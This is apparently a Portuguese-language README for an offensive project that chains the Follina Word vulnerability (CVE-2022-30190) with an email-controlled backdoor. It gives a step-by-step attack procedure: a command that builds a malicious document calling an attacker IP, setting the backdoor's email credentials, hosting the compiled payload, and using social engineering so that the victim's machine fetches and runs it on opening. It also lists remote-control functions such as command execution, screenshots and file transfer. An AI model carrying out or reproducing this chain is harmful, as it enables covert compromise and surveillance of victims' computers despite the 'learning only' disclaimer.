AmzWord
uma cadeia de ataque automatizada baseada em CVE-2022-30190, backdoor de e-mail 163 e esteganografia de imagem
Agradecemos aos seguintes repositórios do GitHub, dos quais referenciamos e modificamos parte do código para integrar e implementar nosso trabalho:
README em chinês veja aqui
Requisitos
gdog:
- Python 2.7
- Módulo PyCrypto
- Módulo WMI
- Módulo Enum34
- Módulo Netifaces
follina:
Uso e processo de ataque
-
Use follina.py para construir um arquivo Word malicioso e ativar a escuta http
- Você pode alterar o nome padrão e o ip padrão no código
- Você também pode usar
--ip e --output para especificar
- Consulte follina para obter detalhes de uso. Não alteramos a interface de uso.
- ex:
python follina.py --ip 100.100.100.100 --output maldoc.doc
-
Modifique client.py e gdog.py dentro de gdog e preencha as seguintes informações
gmail_user = 'your email'
gmail_pwd = 'your pwd'
server = "smtp server"
imap_server = 'imap server'
-
Compile client.py em tar.exe e coloque-o em /follina/www
-
Use qualquer método de engenharia social para enviá-lo ao alvo. Assim que a vítima abrir o Word, o tar.exe será baixado e executado automaticamente.
-
O atacante executa o gdog localmente e envia comandos para controlar a máquina alvo. Para uso, veja gdog
Observação
- Isso é apenas uma demonstração da implementação da cadeia de ataque. O exe em execução pode até ser encontrado no gerenciador de tarefas, o que facilita a observação do efeito. Não realizamos nenhuma operação como antivírus, ocultação e escalada de privilégios. Claro, essas não são difíceis no Windows, certo?
- O projeto gdog existe há muito tempo, e gastamos muito esforço para fazê-lo funcionar com sucesso. Os comandos de controle remoto atualmente confirmados incluem: executar comandos, capturar telas, exibir janelas pop-up, desligar, bloquear a tela e transferir arquivos. Essas funções são suficientes para atender à maioria das necessidades.
- Não sei por que, mas parece haver algum problema com a pesquisa SUBJECT do imap. Não conseguimos pesquisar e-mails com o assunto alvo, e o valor de retorno está vazio. Só podemos adotar outros métodos, como ler todos os e-mails não lidos, filtrar os alvos e depois marcar os outros como não lidos. Isso pode causar problemas quando houver muitos usuários controlados e precisa ser resolvido.
- Este projeto é apenas para fins de aprendizado e intercâmbio.